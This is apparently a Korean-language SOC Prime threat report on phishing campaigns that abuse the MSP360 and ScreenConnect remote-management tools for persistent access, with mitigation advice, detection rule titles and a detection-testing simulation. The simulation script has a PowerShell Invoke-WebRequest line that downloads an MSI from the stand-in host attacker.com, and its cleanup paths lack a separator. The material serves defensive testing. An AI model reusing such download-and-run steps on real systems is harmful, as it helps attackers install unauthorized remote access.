SOC Prime Bias: High

01 Oct 2026 08:13 UTC

피싱, 영구적인 접근을 위해 RMM 도구 악용

Author Photo
SOC Prime Team linkedin icon 팔로우
피싱, 영구적인 접근을 위해 RMM 도구 악용
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

위협 행위자들은 피싱 캠페인을 통해 신뢰할 수 있는 소프트웨어로 위장된 합법적인 MSP360 RMM 설치 프로그램을 전달하고 있습니다. 설치 프로그램이 실행되면 지속화가 이루어지고, 이후 ConnectWise ScreenConnect를 다운로드 및 배포하여 공격자에게 추가적인 원격 접근 채널을 제공합니다. 이는 자격 증명 도용 및 민감한 데이터 수집을 포함한 추가적인 타협 후 활동을 가능케 합니다.

조사

Microsoft Defender 전문가들은 Zoom, Adobe, 그리고 합법적인 회의 초대를 사칭한 여러 피싱 미끼를 식별하여 MSP360 v2.5.0.67을 배포했습니다. 연구원들은 서비스 설치 및 2차 RMM 도구의 배포를 통한 초기 사용자 실행 및 UAC 상승을 추적하여 감염 체인을 재구성했습니다. 또한 공격자들은 Amazon S3 및 Dropbox와 같은 신뢰할 수 있는 클라우드 플랫폼을 악성 페이로드 호스팅에 악용한다는 사실을 밝혀냈습니다.

완화

조직은 MFA를 적용하고 승인된 RMM 도구에 대한 엄격한 애플리케이션 제어 정책을 구현하여 승인되지 않은 설치를 방지해야 합니다. 인증서 기반의 차단 규칙은 특정 서명된 응용 프로그램을 추가로 제한할 수 있습니다. 클라우드 기반의 안티바이러스 보호 및 공격 표면 감소 규칙을 통해 엔드포인트 방어를 강화하는 것도 노출을 줄이는 데 필수적입니다.

대응

허가되지 않은 RMM 설치가 발견되면, 보안 팀은 즉시 영향을 받은 서비스 설치와 관련된 자격 증명을 재설정해야 합니다. 시스템 계정의 의심스러운 타협은 전체 공격 범위를 결정하기 위한 포괄적인 조사가 필요합니다. 의심스러운 원격 관리 세션 및 관련 타협 후 활동을 식별하기 위해 엔드포인트 탐지 로그를 검토하십시오.

공격 흐름

이 부분은 아직 업데이트 중입니다.

탐지

Powershell을 통한 다운로드 또는 업로드 (cmdline 사용)

SOC Prime 팀
2026년 9월 30일

비정상 코드 페이지 실행 (cmdline 사용)

SOC Prime 팀
2026년 9월 30일

대체 원격 접근 / 관리 소프트웨어 (process_creation 사용)

SOC Prime 팀
2026년 9월 30일

Powershell에서 수상한 .NET 메서드 호출 (powershell 사용)

SOC Prime 팀
2026년 9월 30일

비정상 최상위 도메인 (TLD) DNS 요청에 의한 수상한 명령 및 제어 (dns 사용)

SOC Prime 팀
2026년 9월 30일

IOCs (HashSha256) 탐지: 피싱이 지속적인 접근을 위한 RMM 도구 남용

SOC Prime AI 규칙
2026년 9월 30일

IOCs (HashSha1) 탐지: 피싱이 지속적인 접근을 위한 RMM 도구 남용

SOC Prime AI 규칙
2026년 9월 30일

원격 MSI 패키지 다운로드를 위한 PowerShell Invoke-WebRequest 탐지 [Windows Powershell]

SOC Prime AI 규칙
2026년 9월 30일

피싱이 지속적인 접근을 위한 RMM 도구 남용 [Windows Process Creation]

SOC Prime AI 규칙
2026년 9월 30일

시뮬레이션 실행

  • 공격 서사 및 명령: 공격자가 스피어 피싱 캠페인을 시작합니다. 피해자는 PowerShell 단일 행을 트리거하는 링크를 클릭합니다. 이 명령은 Invoke-WebRequest 를 사용하여 다운로드합니다 ClientSetup.msi (ScreenConnect 설치 프로그램을 시뮬레이션) 원격 서버에서. 다운로드가 완료되면 공격자는 MSI를 실행하고 시뮬레이션의 최종 단계에서는 ScreenConnect.WindowsClient.exe 를 실행하여 설정된 원격 접속 세션을 모방합니다. 이 시퀀스는 selection_2 AND selection_3 룰의 논리를 트리거하도록 설계되었습니다.

  • 회귀 테스트 스크립트:

    # 피싱 기반 RMM 배포 시뮬레이션
    $tempDir = $env:TEMP
    $msiName = "ClientSetup.msi"
    $exeName = "ScreenConnect.WindowsClient.exe"
    $msiPath = Join-Path $tempDir $msiName
    $exePath = Join-Path $tempDir $exeName
    
    # 1. PowerShell 다운로드 시뮬레이션 (선택 2의 A 부분)
    Write-Host "[+] MSI의 PowerShell 다운로드를 시뮬레이션 중..."
    # MSI 다운로드 시뮬레이션을 위한 더미 파일 사용
    New-Item -Path $msiPath -ItemType File -Force
    
    # 이 명령은 'Invoke-WebRequest'와 'ClientSetup.msi' 논리를 매칭합니다
    powershell.exe -Command "Invoke-WebRequest -Uri 'http://attacker.com/ClientSetup.msi' -OutFile '$msiPath'"
    
    # 2. ScreenConnect 클라이언트 시뮬레이션을 위한 더미 실행 파일 생성 (선택 3)
    Write-Host "[+] ScreenConnect 실행 파일을 생성 중..."
    New-Item -Path $exePath -ItemType File -Force
    
    # 3. 클라이언트 실행 (선택 3 및 선택 2 완성)
    Write-Host "[+] ScreenConnect 클라이언트 실행 중..."
    Start-Process -FilePath $exePath
  • 정리 명령:

    # 시뮬레이션 아티팩트 정리
    Remove-Item -Path "$env:TEMPClientSetup.msi" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPScreenConnect.WindowsClient.exe" -Force -ErrorAction SilentlyContinue
    Write-Host "[+] 정리 완료."